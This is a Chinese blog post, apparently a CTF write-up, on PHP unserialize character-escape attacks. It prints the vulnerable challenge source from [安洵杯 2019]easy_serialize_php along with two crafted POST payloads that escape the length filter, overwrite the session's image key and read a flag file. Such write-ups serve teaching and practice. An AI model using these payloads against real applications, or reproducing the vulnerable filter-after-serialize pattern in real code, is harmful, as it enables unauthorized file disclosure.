反序列化之字符逃逸

web原理讲解
发布日期:   2023-07-26
更新日期:   2023-07-26
文章字数:   802
阅读时长:   3 分

反序列化之字符逃逸

原理:

因为序列化的字符串是严格的,对应的格式不能错,比如s:4:”name”,那s:4就必须有一个长度是4的字符串,没有就往后要。
并且unserialize会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号后面的就都被扔掉。
例如:

<?php
#正规序列化的字符串
$a = "a:2:{s:3:\"one\";s:4:\"flag\";s:3:\"two\";s:4:\"test\";}";
var_dump(unserialize($a));
#带有多余的字符的字符串
$a_laji = "a:2:{s:3:\"one\";s:4:\"flag\";s:3:\"two\";s:4:\"test\";};s:3:\"真的垃圾img\";lajilaji";
var_dump(unserialize($a_laji));
运行的结果都是
array(2) {
  ["one"]=>
  string(4) "flag"
  ["two"]=>
  string(4) "test"
}

[安洵杯 2019]easy_serialize_php 1

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

关健代码:

echo file_get_contents(base64_decode($userinfo['img']));

我们需要将_SESSION[‘img’]覆盖为flag的文件名,上面虽然有设置img的值但是会对其进行sha1加密,而下面没有相对于的解密函数,所以我们选择对_SESSION进行直接覆盖,把源代码给的img参数放在序列化}的右边丢掉。

方法一:键值逃逸

先写出img想要的序列化:s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";} (ZDBnM19mMWFnLnBocA==为d0g3_f1ag.php的base64加密值) 然后在这串字符串前后开始构造payload,再让function等于构造好的序列化'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}'最后用会被过滤的字符串设计长度_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}&function=show_image 序列化结果为:a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
flagflagflagflagflagflag长度24,被过滤后向后取24长度";s:8:"function";s:59:"a作为user的内容(注意这里因为长度要为24且向后取到的内容要以”结尾,但不包括”,所以要加个a如果是23个字符就不用加a了),然后s:3:”img”就会被当作键名s:20:”ZDBnM19mMWFnLnBocA==”就会被当作键值,加上s:2:”dd”;s:1:”a”是因为_SESSION有三个键对,保持格式用

方法二:键名逃逸

原理也是一样的payload=_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}序列化结果为"a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
参考链接1
参考链接2

文章作者: 矢坕
文章链接: http://airunfive.github.io/2023/07/26/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8B%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 矢坕 !
web原理讲解
  目录